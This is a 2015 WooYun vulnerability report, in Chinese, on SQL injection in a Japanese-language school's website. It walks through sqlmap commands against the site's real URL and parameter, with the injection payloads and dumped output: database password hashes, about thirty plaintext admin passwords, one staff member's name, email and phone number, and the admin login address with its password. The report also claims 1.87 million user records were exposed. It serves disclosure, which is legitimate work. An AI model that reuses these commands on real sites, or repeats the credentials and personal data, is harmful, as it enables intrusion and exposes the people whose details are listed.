当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139646

漏洞标题:樱花国际日语存在SQL注入漏洞(187万用户的姓名/手机号/归属地等信息泄露)

相关厂商:樱花国际日语

漏洞作者: 路人甲

提交时间:2015-09-08 10:22

修复时间:2015-10-23 10:24

公开时间:2015-10-23 10:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

樱花国际日语存在SQL注入漏洞(sa权限),可登陆后台,致使187万用户的姓名,手机号,归属地等信息泄露。
樱花国际日语 绽放你的人生!

详细说明:

使用sqlmap神器进行测试:
1. 初始测试

sqlmap.py -u "http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0" -p cityId --dbs --current-user --users --is-dba --password --threads=10


2. 继续测试(竟然是明文储存)

sqlmap.py -u "http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0" -p cityId -D neworld_sakura -T admin -C id,logname,pwd --dump


3. 爆出管理员密码(admin888)

sqlmap.py -u "http://www.sakurajp.com.cn/channel.aspx?vid=38&cityId=0" -p cityId -D SakuraCMS -T UserInfo -C Email,Mobile,RealName,UserAccount,UserId,UserPwd --dump


Parameter: cityId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: vid=38&cityId=0 AND 2957=2957
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: vid=38&cityId=0 AND 6349=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (6349=6349) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)))
---


web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'jackchenyang'
current user is DBA:    True
database management system users [5]:
[*] jackchenyang
[*] sa
[*] SakuraCMS
[*] sakuraweb
[*] swx
database management system users password hashes:
[*] jackchenyang [1]:
    password hash: 0x010064f6592203bbeddb5d1fc28c20eef1005365b022da05ff7a
        header: 0x0100
        salt: 64f65922
        mixedcase: 03bbeddb5d1fc28c20eef1005365b022da05ff7a
[*] sa [1]:
    password hash: 0x01004086ceb6acb6cb34f9ad21709304eb07039aedfa8a57ff0a
        header: 0x0100
        salt: 4086ceb6
        mixedcase: acb6cb34f9ad21709304eb07039aedfa8a57ff0a
[*] SakuraCMS [1]:
    password hash: 0x010042a0ef21f2a16e2f3d5fea957822df49ca86f56ea2d1ff12
        header: 0x0100
        salt: 42a0ef21
        mixedcase: f2a16e2f3d5fea957822df49ca86f56ea2d1ff12
[*] sakuraweb [1]:
    password hash: 0x010019d2c4a84e8b68049969c35ae38e557642a4f99736c7797e
        header: 0x0100
        salt: 19d2c4a8
        mixedcase: 4e8b68049969c35ae38e557642a4f99736c7797e
[*] swx [1]:
    password hash: 0x01006df54d7734de89907c0cf0aa1b131fdbe16a1fc135853ff8
        header: 0x0100
        salt: 6df54d77
        mixedcase: 34de89907c0cf0aa1b131fdbe16a1fc135853ff8
available databases [9]:
[*] liuxueDB
[*] LX
[*] master
[*] model
[*] msdb
[*] neworld_sakura
[*] SakuraCMS
[*] tempdb
[*] WeiXinCMS


Database: neworld_sakura
[61 tables]
+----------------------------+
| Activities                 |
| AdManage                   |
| Dm_Mobile                  |
| Gift                       |
| Sakura_AD                  |
| Sakura_Gift                |
| Sakura_Register            |
| Sakura_Tips                |
| Sakura_batch               |
| Sakura_log                 |
| Smart_AdGroup              |
| Smart_AdList               |
| Smart_AdManage             |
| Smart_AuthInfo             |
| Smart_Channel              |
| Smart_Channel_CustomFields |
| Smart_City                 |
| Smart_Content              |
| Smart_Custom_Pages         |
| Smart_Custom_Tags          |
| Smart_Dict                 |
| Smart_Event                |
| Smart_Extend_Blogroll      |
| Smart_Log                  |
| Smart_Media                |
| Smart_MenuInfo             |
| Smart_RoleInfo             |
| Smart_Special              |
| Smart_Upload               |
| Smart_User                 |
| UserInfo                   |
| UserInfos                  |
| UserMenu                   |
| UserPermission             |
| UserRole                   |
| admin                      |
| aduser                     |
| db_Active                  |
| db_AdMange                 |
| db_Admin                   |
| db_City                    |
| db_DistinctMb              |
| db_Log                     |
| db_Media                   |
| db_Media_log               |
| db_Register                |
| db_batch                   |
| dtproperties               |
| s_area                     |
| s_city                     |
| s_info                     |
| s_job                      |
| s_mobile                   |
| s_news                     |
| s_template                 |
| s_templatetables           |
| sysdiagrams                |
| v_AdMange                  |
| v_RegisterList             |
| v_index                    |
| v_votess_download          |
+----------------------------+
Database: neworld_sakura
Table: admin
[30 entries]
+----+------------+---------------------+
| id | logname    | pwd                 |
+----+------------+---------------------+
| 1  | admin      | sakurajp1234567*()  |
| 10 | 深圳         | sakurajpsz_d8k      |
| 11 | 苏州         | sz_sakurajp         |
| 12 | 杭州         | hz_sakurajp         |
| 13 | 无锡         | wx_sakurajp         |
| 14 | 宁波         | nb_sakurajp         |
| 15 | 东莞         | <blank>             |
| 16 | test       | test                |
| 17 | 南京         | nj_sakurajp         |
| 18 | 南通         | nt_sakurajp         |
| 19 | 天津         | tj_sakurajp         |
| 20 | 重庆         | 123456              |
| 21 | sakurajpCD | CDsakurajp          |
| 22 | 厦门         | 1234567             |
| 23 | 合肥         | sakurajphf_1126     |
| 24 | 昆山         | sakurajpks_1126     |
| 25 | 江苏         | js_sakurajp         |
| 26 | 武汉         | wh_sakurajp         |
| 28 | 常州         | cz_sakurajp         |
| 29 | 福州         | <blank>             |
| 30 | 佛山         | fs_sakurajp         |
| 31 | 广东         | gd_sakurajp         |
| 32 | 福建         | fj_sakurajp         |
| 35 | 济南         | jn_sakurajp123      |
| 36 | 常熟         | changshu            |
| 5  | 北京         | sakurajpbj_843      |
| 6  | 上海         | sakurajpsh021       |
| 7  | 青岛         | sakurajpqd_klu123   |
| 8  | 大连         | dl112233            |
| 9  | 广州         | sakurajpgz_520      |
+----+------------+---------------------+


Database: SakuraCMS
Table: UserInfo
[1 entry]
+----------------------+-------------+----------+-------------+--------+----------------------------------+
| Email                | Mobile      | RealName | UserAccount | UserId | UserPwd                          |
+----------------------+-------------+----------+-------------+--------+----------------------------------+
| jackchenyang@sina.cn | 18221892552 | 陈阳       | admin       | 1      | 7FEF6171469E80D32C0559F88B377245 |
+----------------------+-------------+----------+-------------+--------+----------------------------------+

漏洞证明:

后台登陆地址:http://www.sakurajp.com.cn/admin

1.gif


用户名:admin
密码:admin888

2.gif


一共有用户1875749名,其中姓名,归属地,手机号码等各种泄露。

3.gif


4.gif


5.gif


6.gif


7.gif


8.gif


9.gif


10.gif


11.gif


修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝